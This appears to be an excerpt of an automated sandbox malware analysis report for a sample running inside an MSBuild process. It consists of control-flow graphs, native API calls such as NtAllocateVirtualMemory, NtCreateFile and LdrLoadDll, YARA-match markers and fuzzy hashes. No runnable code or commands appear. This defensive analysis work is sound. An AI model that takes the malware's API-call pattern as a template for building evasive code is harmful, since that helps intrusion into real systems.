41a58c 81982->81983 81986 13c2f90 LdrInitializeThunk 81983->81986 81984 419bb9 81984->81938 81984->81941 81986->81984 81988 408328 81987->81988 81989 40ace0 LdrLoadDll 81988->81989 81990 408343 81989->81990 81991 414e40 LdrLoadDll 81990->81991 81992 408353 81991->81992 81993 40835c PostThreadMessageW 81992->81993 81994 408370 81992->81994 81993->81994 81994->81911 81996 40f673 81995->81996 82002 419e80 81996->82002 82000 41af50 LdrLoadDll 81999->82000 82001 419d5c 82000->82001 82001->81919 82003 41af50 LdrLoadDll 82002->82003 82004 419e9c 82003->82004 82007 13c2dd0 LdrInitializeThunk 82004->82007 82005 40f69e 82005->81911 82007->82005 82008->81842 82010 419fcc 82009->82010 82011 41af50 LdrLoadDll 82009->82011 82014 13c2f30 LdrInitializeThunk 82010->82014 82011->82010 82012 40f4ee 82012->81848 82012->81849 82014->82012 82015->81854 82016->81859 82017->81864 82021 13c2ad0 LdrInitializeThunk

Control-flow Graph
control_flow_graph 0 41a400-41a449 call 41af50 NtReadFile
APIs
• NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A445
Memory Dump Source
• Source File: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
Similarity
• API ID: FileRead
• String ID: !JA$bMA$bMA
• API String ID: 2738559852-4222312340
• Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
• Instruction ID: 27817754ac388b25b847a3362b671b2e44b934df7eae6808a762aa4d31f9cf83
• Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
• Instruction Fuzzy Hash: 93F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 231 40ace0-40ad09 call 41cc50 234 40ad0b-40ad0e 231->234 235 40ad0f-40ad1d call 41d070 231->235 238 40ad2d-40ad3e call 41b490 235->238 239 40ad1f-40ad2a call 41d2f0 235->239 245 40ad40-40ad54 LdrLoadDll 238->245 246 40ad57-40ad5a 238->246 239->238 245->246
APIs
• LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52
Memory Dump Source
• Source File: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
Similarity
• API ID: Load
• String ID:
• API String ID: 2234796835-0
• Opcode ID: c7739da805cbb3b2d9e9c53a0cd9873e2ca33319032631d49d16e6f9fd887cd1
• Instruction ID: ed2a01354a4d3ac1085a6549a7ff89878a805c02732dc59c20595c8cd57bf7d1
• Opcode Fuzzy Hash: c7739da805cbb3b2d9e9c53a0cd9873e2ca33319032631d49d16e6f9fd887cd1
• Instruction Fuzzy Hash: CE015EB5E0020DABDF10EBA1DC42FDEB3789F14308F0041AAE908A7281F634EB54CB95
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 247 41a350-41a3a1 call 41af50 NtCreateFile
APIs
• NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A39D
Memory Dump Source
• Source File: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
• Instruction ID: 880687b14e2bfdcefdfb108c829fe1d34a34742feba638e3287dae326a4d6923
• Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
• Instruction Fuzzy Hash: AAF0BDB2201208AFCB08CF89DC85EEB77ADAF8C754F158248BA1D97241C630E8518BA4
Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 266 41a530-41a56d call 41af50 NtAllocateVirtualMemory
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B124,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A569
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AllocateMemoryVirtual
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2167126740-0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  control_flow_graph 278 41a480-41a496 279 41a49c-41a4a9 NtClose 278->279 280 41a497 call 41af50 278->280 280->279
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A4A5
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Close
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3535843008-0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A4A5
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Close
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3535843008-0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  control_flow_graph 3 41a620-41a651 call 41af50 RtlAllocateHeap
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A64D
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                                                  • String ID: &EA
                                                                                                                                                                                                                                                                  • API String ID: 1279760036-1330915590
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  control_flow_graph 201 408308-40835a call 41be60 call 41ca00 call 40ace0 call 414e40 210 40835c-40836e PostThreadMessageW 201->210 211 40838e-408392 201->211 212 408370-40838a call 40a470 210->212 213 40838d 210->213 212->213 213->211
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessagePostThread
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1836367815-0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  control_flow_graph 216 408310-40831f 217 408328-40835a call 41ca00 call 40ace0 call 414e40 216->217 218 408323 call 41be60 216->218 225 40835c-40836e PostThreadMessageW 217->225 226 40838e-408392 217->226 218->217 227 408370-40838a call 40a470 225->227 228 40838d 225->228 227->228 228->226
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessagePostThread
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1836367815-0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  control_flow_graph 250 41a831-41a83b 251 41a7e3-41a7f4 LookupPrivilegeValueW 250->251 252 41a83d-41a854 250->252 253 41a85a-41a867 252->253 254 41a855 call 41afc0 252->254 254->253
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7F0
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: LookupPrivilegeValue
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3899507212-0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  control_flow_graph 256 40acd5-40acd8 257 40ad24-40ad3e call 41d2f0 call 41b490 256->257 258 40acda-40acdc 256->258 264 40ad40-40ad54 LdrLoadDll 257->264 265 40ad57-40ad5a 257->265 258->257 264->265
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Load
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2234796835-0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  control_flow_graph 269 41a7b1-41a7d9 270 41a7df-41a7f4 LookupPrivilegeValueW 269->270 271 41a7da call 41af50 269->271 271->270
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7F0
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: LookupPrivilegeValue
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3899507212-0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  control_flow_graph 272 41a660-41a691 call 41af50 RtlFreeHeap
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A68D
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FreeHeap
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3298025750-0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  control_flow_graph 275 41a7c0-41a7f4 call 41af50 LookupPrivilegeValueW
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7F0
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: LookupPrivilegeValue
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3899507212-0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6C8
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ExitProcess
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 621844428-0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6C8
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ExitProcess
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 621844428-0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6C8
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ExitProcess
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 621844428-0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                                  • API String ID: 0-2160512332
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim engine DLL$LdrpGetShimEngineInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_InitializeEngine$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                                  • API String ID: 0-3089669407
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
